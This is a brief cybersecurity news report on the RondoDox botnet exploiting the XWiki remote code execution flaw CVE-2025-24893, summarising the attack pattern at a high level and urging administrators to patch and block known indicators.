477/68 Thursday, November 20, 2025
Cybersecurity experts are closely monitoring the rapid spread of RondoDox, a large-scale botnet now exploiting a critical vulnerability in the XWiki platform. The flaw, tracked as CVE-2025-24893, is a Remote Code Execution (RCE) vulnerability that allows attackers to execute arbitrary malicious code on vulnerable systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has already confirmed that this vulnerability is being actively exploited as of October 30. Recent findings from VulnCheck further indicate that multiple threat actors-not just RondoDox-are now abusing this flaw, including groups deploying cryptocurrency mining malware.
According to VulnCheck’s analysis, RondoDox began exploiting the vulnerability on November 3, using HTTP GET requests to inject base64-encoded Groovy code through the XWiki SolrSearch component. This technique forces the targeted server to download and execute a malicious script (rondo.<value>.sh), which acts as a first-stage downloader. The script then retrieves and installs the main RondoDox payload. Researchers also observed additional attack patterns, including attempts to deploy Bash reverse shells and widespread automated scanning using tools like Nuclei to identify other vulnerable systems at scale.
XWiki Platform, an open-source Java-based system commonly used for internal knowledge management in organizations, is particularly at risk-especially versions prior to 15.10.11 and 16.4.1. Security experts strongly urge administrators to apply the latest patches immediately, given the urgency of the situation. Attackers began weaponizing the vulnerability just days after the first reported exploitation. Administrators are also encouraged to implement security controls using the published Indicators of Compromise (IoCs), which can help block malicious traffic, including requests from known RondoDox-associated servers and suspicious user-agent strings.
